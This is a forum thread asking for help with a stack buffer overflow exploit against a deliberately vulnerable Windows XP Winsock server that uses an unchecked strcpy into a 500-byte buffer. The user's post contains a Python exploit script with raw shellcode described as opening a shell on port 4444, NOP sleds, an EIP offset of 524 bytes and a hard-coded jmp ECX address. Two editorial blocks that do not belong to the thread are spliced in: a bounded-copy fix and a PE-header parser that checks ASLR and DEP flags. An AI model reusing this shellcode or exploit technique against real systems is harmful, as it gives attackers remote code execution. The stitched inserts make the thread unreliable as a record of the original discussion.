help in writing exploits win32 xp sp2

Networking/Security Forums -> Exploits // System Weaknesses

Author: abhijit_mohanta PostPosted: Wed Jan 21, 2009 8:33 am    Post subject: help in writing exploits win32 xp sp2
    ----
I am a bit new to exploitation, but I know the basics. I have to write an exploit for the following C code
---------------------------------------------------
Code:
#include <winsock.h>
#include <windows.h>
#include <cstdio>     // printf
#include <cstring>    // strcpy

// Link the Windows socket library
#pragma comment(lib, "wsock32.lib")

// Return codes
#define SS_ERROR 1
#define SS_OK 0

// Copies the received message into a fixed 500-byte stack buffer with no
// length check; this is the overflow the rest of the thread is about.
void pr(char *str)
{
   char buf[500] = "";
   strcpy(buf, str);
}

// Report a socket error and release Winsock
void sError(char *str)
{
   MessageBox(NULL, str, "socket Error", MB_OK);
   WSACleanup();
}

int main(int argc, char **argv)
{
   WORD sockVersion;
   WSADATA wsaData;
   int rVal;
   char Message[5000] = "";

   u_short LocalPort = 200;

   // Initialise Winsock 1.1
   sockVersion = MAKEWORD(1, 1);
   if (WSAStartup(sockVersion, &wsaData) != 0)
   {
      MessageBox(NULL, "Failed WSAStartup()", "socket Error", MB_OK);
      return SS_ERROR;
   }

   // Create the server socket
   SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);
   if (serverSocket == INVALID_SOCKET)
   {
      sError("Failed socket()");   // sError() also calls WSACleanup()
      return SS_ERROR;
   }

   SOCKADDR_IN sin;
   sin.sin_family = AF_INET;
   sin.sin_port = htons(LocalPort);
   sin.sin_addr.s_addr = INADDR_ANY;

   // Bind the socket to port 200 on all interfaces
   rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
   if (rVal == SOCKET_ERROR)
   {
      sError("Failed bind()");
      return SS_ERROR;
   }

   // Start listening
   rVal = listen(serverSocket, 10);
   if (rVal == SOCKET_ERROR)
   {
      sError("Failed listen()");
      return SS_ERROR;
   }

   // Wait for a client to connect
   SOCKET clientSocket = accept(serverSocket, NULL, NULL);
   if (clientSocket == INVALID_SOCKET)
   {
      sError("Failed accept()");
      return SS_ERROR;
   }

   int bytesRecv = SOCKET_ERROR;
   while (bytesRecv == SOCKET_ERROR)
   {
      // Receive up to 5000 bytes. recv() does not NUL-terminate the data,
      // so a full buffer has no terminator when pr() later strcpy()s it.
      bytesRecv = recv(clientSocket, Message, sizeof(Message), 0);

      // WSAECONNRESET is reported through WSAGetLastError(), not as the
      // return value of recv(), which is a byte count or SOCKET_ERROR.
      if (bytesRecv == 0 ||
          (bytesRecv == SOCKET_ERROR && WSAGetLastError() == WSAECONNRESET))
      {
         printf("\nConnection Closed.\n");
         break;
      }
   }

   // Pass the received data to pr()
   pr(Message);

   // Close both sockets and release Winsock
   closesocket(clientSocket);
   closesocket(serverSocket);
   WSACleanup();

   return SS_OK;
}

----------------------------------------------------

I compiled the code with devcpp on Windows XP SP2 (so no stack-protection canary).
After sending a pattern I found out that ECX points to the first character of our input; EIP is overwritten at 524 bytes.
ESP points to the string at the 528th character.

So I found a jmp ECX,
and created a pattern like [AAA...524][BBBB][CCCC..].
I found EIP overwritten with BBBB,
so in the exploit I replaced BBBB with the address of JMP ECX.

So I sent the following exploit:

C:>python exploit.py|nc localhost 200
exploit.py
-------------------------------------------------------------------------

buffer = '\x90' * 100


buffer += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
buffer += "\x3f\x2a\xbd\x83\xeb\xfc\xe2\xf4\x79\x55\xc1\xf0\x6d\xc6\xd5\x42"
buffer += "\x7a\x5f\xa1\xd1\xa1\x1b\xa1\xf8\xb9\xb4\x56\xb8\xfd\x3e\xc5\x36"
buffer += "\xca\x27\xa1\xe2\xa5\x3e\xc1\xf4\x0e\x0b\xa1\xbc\x6b\x0e\xea\x24"
buffer += "\x29\xbb\xea\xc9\x82\xfe\xe0\xb0\x84\xfd\xc1\x49\xbe\x6b\x0e\x95"
buffer += "\xf0\xda\xa1\xe2\xa1\x3e\xc1\xdb\x0e\x33\x61\x36\xda\x23\x2b\x56"
buffer += "\x86\x13\xa1\x34\xe9\x1b\x36\xdc\x46\x0e\xf1\xd9\x0e\x7c\x1a\x36"
buffer += "\xc5\x33\xa1\xcd\x99\x92\xa1\xfd\x8d\x61\x42\x33\xcb\x31\xc6\xed"
buffer += "\x7a\xe9\x4c\xee\xe3\x57\x19\x8f\xed\x48\x59\x8f\xda\x6b\xd5\x6d"
buffer += "\xed\xf4\xc7\x41\xbe\x6f\xd5\x6b\xda\xb6\xcf\xdb\x04\xd2\x22\xbf"
buffer += "\xd0\x55\x28\x42\x55\x57\xf3\xb4\x70\x92\x7d\x42\x53\x6c\x79\xee"
buffer += "\xd6\x6c\x69\xee\xc6\x6c\xd5\x6d\xe3\x57\x3b\xe1\xe3\x6c\xa3\x5c"
buffer += "\x10\x57\x8e\xa7\xf5\xf8\x7d\x42\x53\x55\x3a\xec\xd0\xc0\xfa\xd5"
buffer += "\x21\x92\x04\x54\xd2\xc0\xfc\xee\xd0\xc0\xfa\xd5\x60\x76\xac\xf4"
buffer += "\xd2\xc0\xfc\xed\xd1\x6b\x7f\x42\x55\xac\x42\x5a\xfc\xf9\x53\xea"
buffer += "\x7a\xe9\x7f\x42\x55\x59\x40\xd9\xe3\x57\x49\xd0\x0c\xda\x40\xed"
buffer += "\xdc\x16\xe6\x34\x62\x55\x6e\x34\x67\x0e\xea\x4e\x2f\xc1\x68\x90"
buffer += "\x7b\x7d\x06\x2e\x08\x45\x12\x16\x2e\x94\x42\xcf\x7b\x8c\x3c\x42"
buffer += "\xf0\x7b\xd5\x6b\xde\x68\x78\xec\xd4\x6e\x40\xbc\xd4\x6e\x7f\xec"
buffer += "\x7a\xef\x42\x10\x5c\x3a\xe4\xee\x7a\xe9\x40\x42\x7a\x08\xd5\x6d"
buffer += "\x0e\x68\xd6\x3e\x41\x5b\xd5\x6b\xd7\xc0\xfa\xd5\x75\xb5\x2e\xe2"
buffer += "\xd6\xc0\xfc\x42\x55\x3f\x2a\xbd"

buffer += '\x90' * 100
buffer += '\xC3\x2C\x82\x77' #jmp ECX
buffer += '\x90'*100

print buffer


#jmp eax 77822CC3,7C85D2F4 shellcode size 324 eip overwrites at 524
-----------------------------------------------------------
The above shellcode is for TCP connect; it opens a port at 4444. I have tested the shellcode; it works fine.
But I don't find the exploit working.
It simply crashes the program.
Please suggest why this is so.

Please help as soon as possible.
I have tested the shellcode.

Moderator note: added code tags - capi
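The crash path in the server above is recv() filling Message with up to 5000 unterminated bytes and strcpy() copying them into pr()'s 500-byte buf. The following is an added example, not code from the original post, showing the same receive-and-copy path with the lengths checked; it is portable C with the socket replaced by an in-memory caller, and the names pr_bounded, handle_message and demo_pattern are assumptions.

```c
#include <stddef.h>
#include <string.h>

#define MSG_SIZE 5000   /* size of Message[] in the original server */
#define BUF_SIZE 500    /* size of buf[] in the original pr() */

/* Negative return codes; a non-negative result is the accepted length. */
enum { HM_TOO_LONG = -1, HM_BAD_ARG = -2 };

/* Hardened replacement for pr(): copies at most BUF_SIZE-1 bytes and rejects
 * anything longer instead of overrunning the stack frame. 'len' is the count
 * recv() returned, not strlen(), because received bytes carry no terminator. */
static int pr_bounded(const char *data, size_t len)
{
    char buf[BUF_SIZE];

    if (data == NULL)
        return HM_BAD_ARG;
    if (len >= sizeof buf)      /* the 524-byte pattern from the post stops here */
        return HM_TOO_LONG;
    memcpy(buf, data, len);
    buf[len] = '\0';            /* terminator is ours, not the sender's */
    return (int)strlen(buf);    /* safe to treat as a C string from here on */
}

/* Models the receive path: 'n' is what recv() returned into a MSG_SIZE buffer.
 * A completely full buffer is also rejected, since it leaves no room for a
 * terminator and any later string function would read past it. */
int handle_message(const char *message, size_t n)
{
    if (n > MSG_SIZE - 1)
        return HM_TOO_LONG;
    return pr_bounded(message, n);
}

/* Constructed input: a run of n 'A' bytes, like the pattern sent in the post. */
int demo_pattern(size_t n)
{
    static char message[MSG_SIZE];
    if (n > sizeof message)
        return HM_TOO_LONG;
    memset(message, 'A', n);
    return handle_message(message, n);
}
```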

Author: clonmac PostPosted: Mon Apr 13, 2009 5:54 pm    Post subject:
    ----
Have you verified that the computer running the process is not using address space layout randomization (ASLR)?

When you debug to find the values of EIP, debug several times to ensure that the EIP location stays the same each time you run it. If it changes every time, then the computer is using ASLR, which means that your exploit, the way it is written, won't work. There are ways around ASLR though.
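A complementary check to the repeated-debugging test in this post is to read the DllCharacteristics field of the PE optional header, since an image is only randomized under ASLR if the linker set DYNAMIC_BASE (0x0040), and only opts into DEP if it set NX_COMPAT (0x0100). This is an added example, not code from the thread: it parses an image held in memory, and sample_image builds a constructed skeletal header for the check rather than a real binary.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define DLLCHAR_DYNAMIC_BASE 0x0040  /* image opted into ASLR */
#define DLLCHAR_NX_COMPAT    0x0100  /* image opted into DEP */
#define SAMPLE_LEN 256               /* size of the constructed test image */
enum { PE_OK = 0, PE_BAD_MZ = -1, PE_BAD_PE = -2, PE_TRUNCATED = -3 };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | (uint32_t)rd16(p + 2) << 16; }

/* Reads DllCharacteristics from a PE image in memory: "MZ", e_lfanew at 0x3C,
 * "PE\0\0", a 20-byte COFF header, then the optional header in which the field
 * sits at offset 70 for both PE32 and PE32+. Every offset is bounds-checked. */
int pe_dll_characteristics(const uint8_t *img, size_t len, uint16_t *out)
{
    uint32_t pe;
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z')
        return PE_BAD_MZ;
    pe = rd32(img + 0x3C);
    if (pe > len || len - pe < 4 + 20 + 72)
        return PE_TRUNCATED;
    if (memcmp(img + pe, "PE\0\0", 4) != 0)
        return PE_BAD_PE;
    *out = rd16(img + pe + 4 + 20 + 70);
    return PE_OK;
}

/* 1 if the image has 'flag' set, 0 if not, negative on a parse error. */
int pe_flag_set(const uint8_t *img, size_t len, uint16_t flag)
{
    uint16_t dc;
    int rc = pe_dll_characteristics(img, len, &dc);
    return rc < 0 ? rc : (dc & flag) != 0;
}

/* Constructed sample: a skeletal PE header (not a real binary) carrying the
 * given DllCharacteristics, so the parser can run without a Windows file. */
const uint8_t *sample_image(uint16_t dllchar)
{
    static uint8_t img[SAMPLE_LEN];
    memset(img, 0, sizeof img);
    img[0] = 'M'; img[1] = 'Z';
    img[0x3C] = 0x80;                          /* e_lfanew = 0x80 */
    memcpy(img + 0x80, "PE\0\0", 4);
    img[0x80 + 24 + 70] = (uint8_t)dllchar;    /* little-endian 16-bit field */
    img[0x80 + 24 + 71] = (uint8_t)(dllchar >> 8);
    return img;
}
```

A flag that is clear tells you the build never asked for the mitigation, whereas a flag that is set still depends on the OS honouring it, so the repeated-debugging test remains the final word.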

Author: c0d3r PostPosted: Wed Jul 22, 2009 12:14 pm    Post subject: Re: help in writing exploits win32 xp sp2
    ----
Did you manage to get it to work?

Moderator note: removed full quote of lengthy original post - capi

Author: reitchelazan PostPosted: Sun May 30, 2010 3:53 pm    Post subject:
    ----
I'm new to C++. I have tried out this code but it gets too many errors. :( I give up.


